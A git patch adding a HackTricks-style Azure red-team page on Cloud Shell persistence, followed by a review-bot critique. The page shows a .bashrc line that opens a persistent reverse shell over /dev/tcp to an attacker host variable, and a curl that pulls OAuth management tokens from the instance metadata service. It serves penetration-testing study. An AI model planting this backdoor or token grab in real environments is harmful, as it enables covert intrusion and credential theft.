From a027dd2a21556fad8eec3f2abfcdbc37a27566b0 Mon Sep 17 00:00:00 2001
From: Jaime Polop <117489620+JaimePolop@users.noreply.github.com>
Date: Fri, 17 Jan 2025 17:39:20 +0100
Subject: [PATCH] Add files via upload
---
.../az-cloud-shell-persistence.md | 56 +++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
new file mode 100644
index 000000000..7e6749b1d
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -0,0 +1,56 @@
+# Az - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Cloud Shell Persistence
+
+Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
+
+* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
+* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+
+Example backdoor in .bashrc:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
+
+Additionally query Azure’s metadata service for instance details and tokens:
+{% code overflow="wrap" %}
+```bash
+curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
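Review bot: The claim under the `.bashrc` example, "This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user", gives a timing with no explanation of what keeps the process alive or where the 5 minutes comes from; please state the mechanism or cite the test that produced it, so readers can tell whether it is a fixed limit or an observation. The following line, "Additionally query Azure's metadata service for instance details and tokens:", has no subject and no blank line before `{% code overflow="wrap" %}`, unlike the first code block, and it does not say which identity the returned token belongs to or that the `resource` parameter scopes it to `https://management.azure.com/`. The page also stops at the technique: since it already notes that the home directory lives on an Azure file share and that `.bashrc` runs at every session start, a short closing paragraph telling defenders to review the startup files on that share for unexpected appended lines would make the page usable for detection and cleanup. Finally, both hint blocks advertise AWS and GCP training on an Azure page, and the commit subject "Add files via upload" does not describe the change.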